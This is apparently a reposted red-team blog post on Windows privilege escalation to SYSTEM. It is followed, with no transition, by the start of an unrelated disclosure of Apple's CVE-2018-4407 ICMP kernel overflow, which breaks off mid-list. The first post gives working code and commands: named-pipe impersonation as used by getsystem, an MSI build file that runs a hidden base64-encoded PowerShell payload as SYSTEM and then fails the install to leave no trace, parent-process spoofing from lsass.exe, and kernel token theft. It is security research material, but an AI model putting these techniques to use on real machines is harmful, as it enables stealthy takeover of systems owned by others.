Alternative methods of becoming SYSTEM

( Original text by XPN )

For many pentesters, Meterpreter’s getsystem command has become the default method of gaining SYSTEM account privileges, but have you ever wondered just how this works behind the scenes?

In this post I will show the details of how this technique works, and explore a couple of methods which are not quite as popular, but may help evade detection on those tricky red team engagements.

Meterpreter’s "getsystem"

Most of you will have used the getsystem module in Meterpreter before. For those that haven’t, getsystem is a module offered by the Metasploit-Framework which allows an administrative account to escalate to the local SYSTEM account, usually from local Administrator.

Before continuing, we first need to understand a little about how a process can impersonate another user. Impersonation is a facility provided by Windows that lets a process temporarily take on another user’s security context. For example, if a process acting as an FTP server allows a user to authenticate and only wants to allow access to files owned by that particular user, the process can impersonate that user account and let Windows enforce security.

To facilitate impersonation, Windows exposes numerous native APIs to developers, for example:

  • ImpersonateNamedPipeClient
  • ImpersonateLoggedOnUser
  • RevertToSelf
  • LogonUser
  • OpenProcessToken
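
Returning to the FTP-server example above, here is a purely illustrative sketch (error handling omitted, and the logon and file-serving details are hypothetical) of what impersonation with these APIs looks like in practice:

#include <windows.h>

// Log the client on, serve the file in their security context, then revert.
void serve_file_as_client(const wchar_t *user, const wchar_t *domain, const wchar_t *password)
{
    HANDLE hToken = NULL;

    if (LogonUserW(user, domain, password,
                   LOGON32_LOGON_INTERACTIVE, LOGON32_PROVIDER_DEFAULT, &hToken))
    {
        ImpersonateLoggedOnUser(hToken);   // calling thread now runs as the client

        // ... open the requested file here; Windows checks the ACLs against
        // the impersonated user, not against the service account ...

        RevertToSelf();                    // drop back to the service's own context
        CloseHandle(hToken);
    }
}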

Of these, the ImpersonateNamedPipeClient API call is key to the getsystem module’s functionality, and is responsible for how it achieves its privilege escalation. This API call allows a process to impersonate the access token of another process which connects to a named pipe and performs a write of data to that pipe (that last requirement is important ;). For example, if a process belonging to "victim" connects and writes to a named pipe belonging to "attacker", the attacker can call ImpersonateNamedPipeClient to retrieve an impersonation token belonging to "victim", and therefore impersonate this user. Obviously, this opens up a huge security hole, and for this reason a process must hold the SeImpersonatePrivilege privilege to use it.

This privilege is by default only available to a number of high privileged users:

[Screenshot: default holders of SeImpersonatePrivilege]

This does however mean that a local Administrator account can use ImpersonateNamedPipeClient, which is exactly how getsystem works:

  1. getsystem creates a new Windows service, set to run as SYSTEM, which when started connects to a named pipe.
  2. getsystem spawns a process, which creates a named pipe and awaits a connection from the service.
  3. The Windows service is started, causing a connection to be made to the named pipe.
  4. The process receives the connection, and calls ImpersonateNamedPipeClient, resulting in an impersonation token being created for the SYSTEM user.

All that is left to do is to spawn cmd.exe with the newly gathered SYSTEM impersonation token, and we have a SYSTEM privileged process.
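
As a rough sketch of the pipe-side half of those steps (this is not the actual Metasploit or tool source; the pipe name is made up, error handling is omitted, and the SYSTEM service from steps 1 and 3 is assumed to have been created separately, for example via the Service Control Manager):

#include <windows.h>

int main(void)
{
    // Step 2: create the named pipe and wait for the SYSTEM service to connect.
    HANDLE hPipe = CreateNamedPipeA("\\\\.\\pipe\\demo_getsystem",
                                    PIPE_ACCESS_DUPLEX,
                                    PIPE_TYPE_BYTE | PIPE_WAIT,
                                    1, 0, 0, 0, NULL);

    // Steps 1 and 3 (not shown): create and start a Windows service running as
    // SYSTEM whose only job is to connect to this pipe and write some data to it.
    ConnectNamedPipe(hPipe, NULL);

    // Data must actually be read from the pipe before impersonation is allowed,
    // hence the requirement that the client performs a write.
    char buf[16];
    DWORD bytesRead = 0;
    ReadFile(hPipe, buf, sizeof(buf), &bytesRead, NULL);

    // Step 4: impersonate the connecting SYSTEM client, then convert the thread's
    // impersonation token into a primary token we can launch a process with.
    ImpersonateNamedPipeClient(hPipe);

    HANDLE hToken = NULL, hPrimary = NULL;
    OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, FALSE, &hToken);
    DuplicateTokenEx(hToken, TOKEN_ALL_ACCESS, NULL,
                     SecurityImpersonation, TokenPrimary, &hPrimary);

    STARTUPINFOW si = { sizeof(si) };
    PROCESS_INFORMATION pi;
    CreateProcessWithTokenW(hPrimary, 0, L"C:\\Windows\\System32\\cmd.exe",
                            NULL, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi);
    return 0;
}

Note that both the impersonation and CreateProcessWithTokenW calls rely on the caller holding SeImpersonatePrivilege, which is why an elevated Administrator (or service) context is required.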

To show how this can be achieved outside of the Metasploit Framework, I’ve previously released a simple tool which will spawn a SYSTEM shell when executed. This tool follows the same steps as above, and can be found on my github account here.

To see how this works when executed, a demo can be found below:

Now that we have an idea just how getsystem works, let’s look at a few alternative methods which can allow you to grab SYSTEM.

MSIExec method

For anyone unlucky enough to follow me on Twitter, you may have seen my recent tweet about using a .MSI package to spawn a SYSTEM process:

Adam Chester@_xpn_

There is something nice about embedding a Powershell one-liner in a .MSI, nice alternative way to execute as SYSTEM 🙂

This came about after a bit of research I was doing into the Duqu 2.0 malware, in which the APT actor delivered malware packaged within an MSI file.

It turns out that one benefit of launching your code via an MSI is the SYSTEM privileges you gain during the install process. To understand how this works, we need to look at the WIX Toolset, an open source project used to create MSI files from XML build scripts.

The WIX Framework is made up of several tools, but the two that we will focus on are:

  • candle.exe — Takes a .WIX XML file and outputs a .WIXOBJ
  • light.exe — Takes a .WIXOBJ and creates a .MSI

Reviewing the documentation for WIX, we see that custom actions are provided, which give the developer a way to launch scripts and processes during the install process. Within the CustomAction documentation, we see something interesting:

[Screenshot: WIX CustomAction documentation]

This documents a simple way in which an MSI can be used to launch processes as SYSTEM: by providing a custom action with the Impersonate attribute set to "no".

When crafted, our WIX file will look like this:

<?xml version="1.0"?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
<Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Example Product Name" Version="0.0.1" Manufacturer="@_xpn_" Language="1033">
<Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer Package"/>
<Media Id="1" Cabinet="product.cab" EmbedCab="yes"/>
<Directory Id="TARGETDIR" Name="SourceDir">
<Directory Id="ProgramFilesFolder">
<Directory Id="INSTALLLOCATION" Name="Example">
<Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222">
<File Id="ApplicationFile1" Source="example.exe"/>
</Component>
</Directory>
</Directory>
</Directory>
<Feature Id="DefaultFeature" Level="1">
<ComponentRef Id="ApplicationFiles"/>
</Feature>
<Property Id=»cmdline»>powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAJwBIADQAcwBJAEEARABlAGgAQQBGAG8AQwBBADcAVgBXAGIAVwAvAGEAUwBCAEQAKwBuAEUAcgA5AEQAMQBhAEYAaABLADAAUwBEAEkAUwBVAEoAbABLAGwAVwAvAE8AZQBBAEkARQA0AEcAQQBoAEYAcAA0ADIAOQBOAGcAdQBMADEAMQAyAHYAZQBlAHYAMQB2ADkAOABZADcASgBTAHEAeQBWADIAdgAwAGwAbQBKADIAUABYAE8ANwBEADcAegB6AEQATQA3AGQAaQBQAGYAbABwAFQANwBTAHIAZwBZADMAVwArAFgAZQBLADEAOABmAGYAdgBtAHIASQA4AEYAWABpAGwAcQBaAHQAMABjAFAAeABRAHIAKwA0AEQAdwBmAGsANwBKAGkASABFAHoATQBNAGoAVgBwAGQAWABUAHoAcwA3AEEASwBpAE8AVwBmADcAYgB0AFYAYQBHAHMAZgBGAEwAVQBLAFEAcQBDAEcAbAA5AGgANgBzACsAdQByADYAdQBSAEUATQBTAFgAeAAzAG0AKwBTAFMAUQBLAFEANwBKADYAWQBwAFMARQBxAHEAYgA4AHAAWQB6AG0AUgBKAEQAegB1ADYAYwBGAHMAYQBYAHkAVgBjAG4AOABtAFcAOAB5AC8AbwBSAFoAWQByAGEAcgBZAG4AdABPAGwASABQAGsATwAvAEYAYQBoADkAcwA0AHgAcABnADMAQQAwAGEAbABtAHYAMwA4AE8AYQB0AE4AegA0AHUAegBmAFAAMQBMAGgARgBtAG8AWgBzADEAZABLAE0AawBxADcAegBDAFcAMQBaAFIAdgBXAG4AegBnAHcAeQA0AGcAYQByAFoATABiAGMARgBEADcAcwByADgAaQBQAG8AWABwAGYAegBRAEQANwBGAEwAZQByAEQAYgBtAG4AUwBKAG4ASABNAG4AegBHAG8AUQBDAGYAdwBKAEkAaQBQAGgASwA4ADgAeAB4AFoAcwBjAFQAZABRAHMARABQAHUAQwAyADgAaAB4AEIAQQBuAEIASQA5AC8AMgAxADMAeABKADEASQB3AGYATQBaAFoAVAAvAGwAQwBuAEMAWQBMADcAeQBKAGQAMABSAFcAQgBkAEUAcwBFAEQAawA0AGcAMQB0AFUAbQBZAGIAMgBIAGYAWQBlAFMAZQB1AEQATwAxAFIAegBaAHAANABMAC8AcQBwAEoANAA2AGcAVgBWAGYAQwBpADAASAAyAFgAawBGAGEAcABjADcARQBTAE4ASAA3ADYAegAyAE0AOQBqAFQAcgBHAHIAdwAvAEoAaABaAG8ATwBQAGIAMgB6AGQAdgAzADcAaQBwAE0ASwBMAHEAZQBuAGcAcQBDAGgAaQBkAFQAUQA5AGoAQQBuAGoAVgBQAGcALwBwAHcAZQA2AFQAVQBzAGcAcABYAFQAZwBWAFMAeQA1ADIATQBNADAAOABpAEkAaABvAE0AMgBVAGEANQAyAEkANgBtAHkAawBaAHUANwBnAHEANQBsADcAMwBMADYAYgBHAFkARQBxAHMAZQBjAEcAeAB1AGwAVgA0AFAAYgBVADQAZABXAGIAZwBsAG0AUQBxAHMANgA2AEkAWABxAGwAUwBpAFoAZABlAEYAMQAyAE4AdQBOAFEAbgB0AFoAMgBQAFYAOQBSAE8AZABhAFcAKwBSAEQAOQB4AEcAVABtAEUAbQBrAC8ATgBlAG8AQgBOAHoAUwBZAEwAeABLAGsAUgBSAGoAdwBzAFkAegBKAHoAeQB2AFIAbgB0AC8AcQBLAHkAbQBkAGYASQA2AEwATQBJAFEATABaAGsATQBJAFEAVQBFAEYAMgB0AFIALwBCAEgAUABPAGoAWgB0AHQAKwBsADYAeQBBAHEAdQBNADgAQwAyAGwAdwBRAGMAMABrAHQAVQA0AFUAdgBFAHQAUABqACsAZABnAGwASwAwAHkASABJAFkANQBwAFIAOQBCAE8AZABrADUAeABTAFMAWQBFAFMAZQBuAEkARAArAGsAeQBSAEsASwBKAEQAOABNAHMAOQAvAGgAZABpAE0AbQBxAFkAMQBEAG0AVwA0ADMAMAAwADYAbwBUAEkANgBzAGMAagArAFUASQByAEkAaABnAFIARAArAGcAeABrAFEAbQAyAEkAVwBzADUARgBUAFcAdABRAGgAeABzADYAawBYAG4AcAAwADkAawBVAHUAcQBwAGcAeAA2AG4AdQB3ADAAeABwAHkAQQBXADkAaQBEAGsAdwBaAHkAMABJAEEAeQBvAE0ARQB0AEwAeABKAFoASABzAFYATQBMAEkAQwBtADAATgBwAE4AeABqADIAbwBKAEMAVABVAGoAagBvAEMASAB2AEUAeQBiADQAQQBNAGwAWAA2AFUAZABZAHgASQB5AGsAVgBKAHgAQQBoAHoAUwBiAGoATQBxAGQAWQBWAEUAaQA0AEoARwBKADIAVQAwAG4AOQBIAG8AcQBUAEsAeQBMAEYAVQB4AFUAawB5AFkAdQBhAFYAcwAzAFUAMgBNAGwAWQA2ADUAbgA5ADMAcgBEADIAcwBVAEkAVABpAGcANgBFAEMAQQBsAGsATgBBAFIAZgBHAFQAZwBrAEgAOABxAG0ARgBFAEMAVgArAGsANgAvAG8AMQBVAEUAegA2AFQAdABzADYANQB0AEwARwBrAFIAYgBXAGkAeAAzAFkAWAAvAEkAYgAxAG8AOAAxAHIARgB1AGIAMQBaAHQASAB
SAFIAMgA4ADUAZAAxAEEANwBiADMAVgBhAC8ATgBtAGkAMQB5AHUAcwBiADAAeQBwAEwAcwA5ADYAVwB0AC8AMgAyADcATgBiAEgAaQA0AFcASgBXAHYAZgBEAGkAWAB4AHMAbwA5AFkARABMAFMAdwBuADUAWAAxAHcAUQAvAGQAbQBCAHoAbQBUAHIAZgA1AGgAYgArAHcAMwBCAFcATwA3AFgAMwBpAE8ATwA2AG0ANQByAGwAZAB4AHoAZgB2AGkAWgBZAE4AMgBSAHQAVwBCAFUAUwBqAGgAVABxADAAZQBkAFUAYgBHAHgAaQBpAFUAdwB6AHIAZAB0AEEAWgAwAE8ARgBqAGUATgBPAFQAVAB4AEcASgA0ADYATwByAGUAdQBIAGkARgA2AGIAWQBqAEYAbABhAFIAZAAvAGQAdABoAEoAcgB6AEMAMwB0AC8ANAAxAHIATgBlAGQAZgBaAFQAVgByADYAMQBhAGkAOABSAEgAVwBFAHEAbgA3AGQAYQBoAGoAOABkAG0ASQBJADEATgBjAHQANwBBAFgAYwAzAFUAQwBRAEkANgArAEsAagBJAFoATgB5AGUATgBnADIARABBAEcAZwA0AGEAQgBoAHMAMwBGAGwAOQBxAFYANwBvAEgAdgBHAE0AKwBOAGsAVgBXAGkAagA4AEgANABmAGcANwB6AEIAawBDADQAMQBRAHYAbAB0AGsAUAAyAGYARABJAEEALwB5AFoASAAyAEwAcwBIAEcANgA5AGEAcwB1AGMAdQAyAE4AVABlAEkAKwBOADkAagA0AGMAbAB2AEQAUQA0AE0AcwBDAG0AOABmAGcARgBjAEUAMgBDAFIAcAAvAEIAKwBzAE8AdwB4AEoASABGAGUAbQBPAE0ATwBvACsANwBoAHEANABYAEoALwAwAHkAYQBoAFgAbwBxAE8AbQBoAGUARQB2AHMARwBRAE8ATQB3AG4AVgB0AFgAOQBPAEwAbABzAE8AZAAwAFcAVgB2ADQAdQByAFcAbQBGAFgAMABXAHYAVQBoAHMARgAxAGQAMQB6AGUAdAAyAHEAMwA5AFcATgB4ACsAdgBLAHQAOAA3AEkAeQBvAHQAZQBKAG8AcQBPAHYAVwB1ADEAZwBiAEkASQA0AE0ARwBlAC8ARwBuAGMAdQBUAGoATAA5ADIAcgBYAGUAeABDAE8AZQBZAGcAUgBMAGcAcgBrADYAcgBzAGMARgBGAEkANwBsAHcAKwA1AHoARwBIAHEAcgA2ADMASgBHAFgAUgBQAGkARQBRAGYAdQBDAEIAcABjAEsARwBqAEgARwA3AGIAZwBMAEgASwA1AG4ANgBFAEQASAB2AGoAQwBEAG8AaAB6AEMAOABLAEwAMAA0AGsAaABUAG4AZwAyADEANwA1ADAAaABmAFgAVgA5AC8AUQBoAEkAbwBUAHcATwA0AHMAMQAzAGkATwAvAEoAZQBhADYAdwB2AFMAZwBVADQARwBvAHYAYgBNAHMARgBDAFAAYgBYAHcANgB2AHkAWQBLAGMAZQA5ADgAcgBGAHYAUwBHAGgANgBIAGwALwBkAHQAaABmAGkAOABzAG0ARQB4AG4ARwAvADAAOQBkAFUAcQA5AHoAKwBIAEgAKwBqAGIAcgB2ADcALwA1AGgAOQBaAGYAbwBMAE8AVABTAHcASAA5AGEAKwBQAEgARgBmAHkATAAzAHQAdwBnAFkAWQBTAHIAQgAyAG8AUgBiAGgANQBGAGoARgAzAHkAWgBoADAAUQB0AEoAeAA4AFAAawBDAEIAUQBnAHAAcwA4ADgAVABmAGMAWABTAFQAUABlAC8AQgBKADgAVABmAEIATwBiAEwANgBRAGcAbwBBAEEAQQA9AD0AJwAnACkAKQA7AEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACQAcwAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7ACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA
</Property>
<CustomAction Id="SystemShell" Execute="deferred" Directory="TARGETDIR" ExeCommand='[cmdline]' Return="ignore" Impersonate="no"/>
<CustomAction Id="FailInstall" Execute="deferred" Script="vbscript" Return="check">
invalid vbs to fail install
</CustomAction>
<InstallExecuteSequence>
<Custom Action="SystemShell" After="InstallInitialize"></Custom>
<Custom Action="FailInstall" Before="InstallFiles"></Custom>
</InstallExecuteSequence>
</Product>
</Wix>

A lot of this is just boilerplate to generate an MSI; however, the parts to note are our property and custom action:

<Property Id="cmdline">powershell...</Property>
<CustomAction Id="SystemShell" Execute="deferred" Directory="TARGETDIR" ExeCommand='[cmdline]' Return="ignore" Impersonate="no"/>

This custom action is responsible for executing our provided cmdline as SYSTEM (note the Property tag, which is a nice way to get around the length limitation of the ExeCommand attribute for long PowerShell commands).

Another useful trick is to ensure that the install fails after our command is executed, which stops the installer from adding a new entry to "Add or Remove Programs". Here this is done by executing invalid VBScript:

<CustomAction Id="FailInstall" Execute="deferred" Script="vbscript" Return="check">
  invalid vbs to fail install
</CustomAction>

Finally, we have our InstallExecuteSequence tag, which is responsible for executing our custom actions in order:

<InstallExecuteSequence>
  <Custom Action="SystemShell" After="InstallInitialize"></Custom>
  <Custom Action="FailInstall" Before="InstallFiles"></Custom>
</InstallExecuteSequence>

So, when executed:

  1. Our first custom action will be launched, forcing our payload to run as the SYSTEM account.
  2. Our second custom action will be launched, causing some invalid VBScript to be executed and stopping the install process with an error.

To compile this into an MSI, we save the above contents as a file called "msigen.wix" and use the following commands:

candle.exe msigen.wix
light.exe msigen.wixobj

Finally, execute the MSI file to execute our payload as SYSTEM:

[Screenshot: SYSTEM shell spawned by the MSI payload]

PROC_THREAD_ATTRIBUTE_PARENT_PROCESS method

This method of becoming SYSTEM was actually revealed to me via James Forshaw’s walkthrough of how to become "Trusted Installer".

Again, if you listen to my ramblings on Twitter, I recently mentioned this technique a few weeks back:

This technique works by leveraging the CreateProcess Win32 API call and its support for assigning the parent of a newly spawned process via the PROC_THREAD_ATTRIBUTE_PARENT_PROCESS attribute.

If we review the documentation of this setting, we see the following:

[Screenshot: PROC_THREAD_ATTRIBUTE_PARENT_PROCESS documentation]

So, if we set the parent of our newly spawned process to a process running as SYSTEM, our new process will inherit its access token. This gives us a cool way to grab the SYSTEM account via the process token.

We can create a new process and set the parent with the following code:

int pid;
HANDLE pHandle = NULL;
STARTUPINFOEXA si;
PROCESS_INFORMATION pi;
SIZE_T size;
BOOL ret;

// Set the PID to a SYSTEM process PID
pid = 555;

// Helper (not shown) that enables SeDebugPrivilege so we can open a SYSTEM-owned process
EnableDebugPriv();

// Open the process which we will inherit the handle from
if ((pHandle = OpenProcess(PROCESS_ALL_ACCESS, false, pid)) == 0) {
	printf("Error opening PID %d\n", pid);
	return 2;
}

// Create our PROC_THREAD_ATTRIBUTE_PARENT_PROCESS attribute
ZeroMemory(&si, sizeof(STARTUPINFOEXA));

InitializeProcThreadAttributeList(NULL, 1, 0, &size);
si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(
	GetProcessHeap(),
	0,
	size
);
InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &size);
UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &pHandle, sizeof(HANDLE), NULL, NULL);

si.StartupInfo.cb = sizeof(STARTUPINFOEXA);

// Finally, create the process
ret = CreateProcessA(
	"C:\\Windows\\system32\\cmd.exe", 
	NULL,
	NULL, 
	NULL, 
	true, 
	EXTENDED_STARTUPINFO_PRESENT | CREATE_NEW_CONSOLE, 
	NULL,
	NULL, 
	reinterpret_cast<LPSTARTUPINFOA>(&si), 
	&pi
);

if (ret == false) {
	printf("Error creating new process (%d)\n", GetLastError());
	return 3;
}

When compiled, we see that we can launch a process and inherit an access token from a parent process running as SYSTEM such as lsass.exe:

[Screenshot: cmd.exe running as SYSTEM with lsass.exe as its parent]

The source for this technique can be found here.

Alternatively, NtObjectManager provides a nice, easy way to achieve this using PowerShell:

New-Win32Process cmd.exe -CreationFlags Newconsole -ParentProcess (Get-NtProcess -Name lsass.exe)

Bonus Round: Getting SYSTEM via the Kernel

OK, so this technique is just a bit of fun, and not something that you are likely to come across in an engagement… but it goes some way to show just how Windows is actually managing process tokens.

Often you will see Windows kernel privilege escalation exploits tamper with a process structure in the kernel address space, with the aim of updating a process token. For example, in the popular MS15-010 privilege escalation exploit (found on exploit-db here), we can see a number of references to manipulating access tokens.

For this analysis, we will be using WinDBG on a Windows 7 x64 virtual machine in which we will be looking to elevate the privileges of our cmd.exe process to SYSTEM by manipulating kernel structures. (I won’t go through how to set up the Kernel debugger connection as this is covered in multiple places for multiple hypervisors.)

Once you have WinDBG connected, we first need to gather information on our running process which we want to elevate to SYSTEM. This can be done using the !process command:

!process 0 0 cmd.exe

Returned we can see some important information about our process, such as the number of open handles, and the process environment block address:

PROCESS fffffa8002edd580
    SessionId: 1  Cid: 0858    Peb: 7fffffd4000  ParentCid: 0578
    DirBase: 09d37000  ObjectTable: fffff8a0012b8ca0  HandleCount:  21.
    Image: cmd.exe

For our purpose, we are interested in the provided PROCESS address (in this example fffffa8002edd580), which is actually a pointer to an EPROCESS structure. The EPROCESS structure (documented by Microsoft here) holds important information about a process, such as the process ID and references to the process threads.

Amongst the many fields in this structure is a pointer to the process’s access token, defined in a TOKEN structure. To view the contents of the token, we must first calculate the TOKEN address. On Windows 7 x64, the process TOKEN is located at offset 0x208; this offset differs between versions (and potentially service packs) of Windows, and can be confirmed for your build with the dt nt!_EPROCESS Token command. We can retrieve the pointer with the following command:

kd> dq fffffa8002edd580+0x208 L1

This returns the token address as follows:

fffffa80`02edd788  fffff8a0`00d76c51

As the token address is referenced within an EX_FAST_REF structure, we must AND the value to gain the true pointer address:

kd> ? fffff8a0`00d76c51 & ffffffff`fffffff0

Evaluate expression: -8108884136880 = fffff8a0`00d76c50
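
For reference, the same masking expressed as a small C sketch; the low 4 bits hold the EX_FAST_REF reference count on x64, which is why masking them off recovers the real pointer:

#include <stdio.h>
#include <stdint.h>

int main(void)
{
    // Value read from _EPROCESS+0x208 above: an EX_FAST_REF, i.e. the TOKEN
    // pointer with a reference count packed into its low 4 bits (x64).
    uint64_t fast_ref = 0xfffff8a000d76c51ULL;
    uint64_t token    = fast_ref & ~0xFULL;   // mask off the embedded count

    printf("TOKEN address: %llx\n", (unsigned long long)token);  // fffff8a000d76c50
    return 0;
}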

Which means that our true TOKEN address for cmd.exe is at fffff8a000d76c50. Next we can dump out the TOKEN structure members for our process using the following command:

kd> !token fffff8a0`00d76c50

This gives us an idea of the information held by the process token:

User: S-1-5-21-3262056927-4167910718-262487826-1001
User Groups:
 00 S-1-5-21-3262056927-4167910718-262487826-513
    Attributes - Mandatory Default Enabled
 01 S-1-1-0
    Attributes - Mandatory Default Enabled
 02 S-1-5-32-544
    Attributes - DenyOnly
 03 S-1-5-32-545
    Attributes - Mandatory Default Enabled
 04 S-1-5-4
    Attributes - Mandatory Default Enabled
 05 S-1-2-1
    Attributes - Mandatory Default Enabled
 06 S-1-5-11
    Attributes - Mandatory Default Enabled
 07 S-1-5-15
    Attributes - Mandatory Default Enabled
 08 S-1-5-5-0-2917477
    Attributes - Mandatory Default Enabled LogonId
 09 S-1-2-0
    Attributes - Mandatory Default Enabled
 10 S-1-5-64-10
    Attributes - Mandatory Default Enabled
 11 S-1-16-8192
    Attributes - GroupIntegrity GroupIntegrityEnabled
Primary Group: S-1-5-21-3262056927-4167910718-262487826-513
Privs:
 19 0x000000013 SeShutdownPrivilege               Attributes -
 23 0x000000017 SeChangeNotifyPrivilege           Attributes - Enabled Default
 25 0x000000019 SeUndockPrivilege                 Attributes -
 33 0x000000021 SeIncreaseWorkingSetPrivilege     Attributes -
 34 0x000000022 SeTimeZonePrivilege               Attributes -

So how do we escalate our process to gain SYSTEM access? Well we just steal the token from another SYSTEM privileged process, such as lsass.exe, and splice this into our cmd.exe EPROCESS using the following:

kd> !process 0 0 lsass.exe
kd> dq <LSASS_PROCESS_ADDRESS>+0x208 L1
kd> ? <LSASS_TOKEN_ADDRESS> & FFFFFFFF`FFFFFFF0
kd> !process 0 0 cmd.exe
kd> eq <CMD_EPROCESS_ADDRESS+0x208> <LSASS_TOKEN_ADDRESS>
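
In a real kernel exploit the same token swap is performed from ring 0 rather than from the debugger, typically by stealing the token of the System process (PID 4) instead of lsass.exe. Below is a hedged sketch of that classic pattern; the UniqueProcessId and ActiveProcessLinks offsets are commonly cited Windows 7 x64 values and, like the 0x208 Token offset, must be verified per build:

#include <ntddk.h>

#define OFFSET_UNIQUE_PROCESS_ID    0x180   /* _EPROCESS.UniqueProcessId (assumed, Win7 x64) */
#define OFFSET_ACTIVE_PROCESS_LINKS 0x188   /* _EPROCESS.ActiveProcessLinks (assumed, Win7 x64) */
#define OFFSET_TOKEN                0x208   /* _EPROCESS.Token (EX_FAST_REF), as used above */
#define SYSTEM_PID                  4

// Runs in kernel context (e.g. as an exploit payload): copy the System
// process's token over the current process's token.
VOID StealSystemToken(VOID)
{
    UCHAR *self  = (UCHAR *)PsGetCurrentProcess();
    UCHAR *eproc = self;

    // Walk the circular ActiveProcessLinks list until we reach PID 4 (System).
    do {
        LIST_ENTRY *links = (LIST_ENTRY *)(eproc + OFFSET_ACTIVE_PROCESS_LINKS);
        eproc = (UCHAR *)links->Flink - OFFSET_ACTIVE_PROCESS_LINKS;
    } while (*(ULONG_PTR *)(eproc + OFFSET_UNIQUE_PROCESS_ID) != SYSTEM_PID);

    // Equivalent of the "eq <CMD_EPROCESS+0x208> <TOKEN_ADDRESS>" step above.
    *(ULONG_PTR *)(self + OFFSET_TOKEN) = *(ULONG_PTR *)(eproc + OFFSET_TOKEN);
}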

To see what this looks like when run against a live system, I’ll leave you with a quick demo showing cmd.exe being elevated from a low level user, to SYSTEM privileges:


Kernel RCE caused by buffer overflow in Apple’s ICMP packet-handling code (CVE-2018-4407)

( Original text )

This post is about a heap buffer overflow vulnerability which I found in Apple’s XNU operating system kernel. I have written a proof-of-concept exploit which can reboot any Mac or iOS device on the same network, without any user interaction. Apple have classified this vulnerability as a remote code execution vulnerability in the kernel, because it may be possible to exploit the buffer overflow to execute arbitrary code in the kernel.

The following operating system versions and devices are vulnerable:

  • Apple iOS 11 and earlier: all devices (upgrade to iOS 12)
  • Apple macOS High Sierra, up to and including 10.13.6: all devices (patched in security update 2018-001)
  • Apple macOS Sierra, up to and including 10.12.6: all devices (patched in security update 2018-005)
  • Apple OS X El Capitan and earlier: all devices

I reported the vulnerability in time for Apple to patch the vulnerability for iOS 12 (released on September 17) and macOS Mojave (released on September 24). Both patches were announced retrospectively on October 30.

Severity and Mitigation

The vulnerability is a heap buffer overflow in the networking code in the XNU operating system kernel. XNU is used by both iOS and macOS, which is why iPhones, iPads, and Macbooks are all affected. To trigger the vulnerability, an attacker merely needs to send a malicious IP packet to the IP address of the target device. No user interaction is required. The attacker only needs to be connected to the same network as the target device. For example, if you are using the free WiFi in a coffee shop then an attacker can join the same WiFi network and send a malicious packet to your device. (If an attacker is on the same network as you, it is easy for them to discover your device’s IP address using nmap.) To make matters worse, the vulnerability is in such a fundamental part of the networking code that anti-virus software will not protect you: I tested the vulnerability on a Mac running McAfee® Endpoint Security for Mac and it made no difference. It also doesn’t matter what software you are running on the device — the malicious packet will still trigger the vulnerability even if you don’t have any ports open.

Since an attacker can control the size and content of the heap buffer overflow, it may be possible for them to exploit this vulnerability to gain remote code execution on your device. I have not attempted to write an exploit which is capable of doing this. My exploit PoC just overwrites the heap with garbage, which causes an immediate kernel crash and device reboot.

I am only aware of two mitigations against this vulnerability:

  1. Enabling stealth mode in the macOS firewall prevents the attack from working. Kudos to my colleague Henti Smith for discovering this, because this is an obscure system setting which is not enabled by default. As far as I’m aware, stealth mode does not exist on iOS devices.
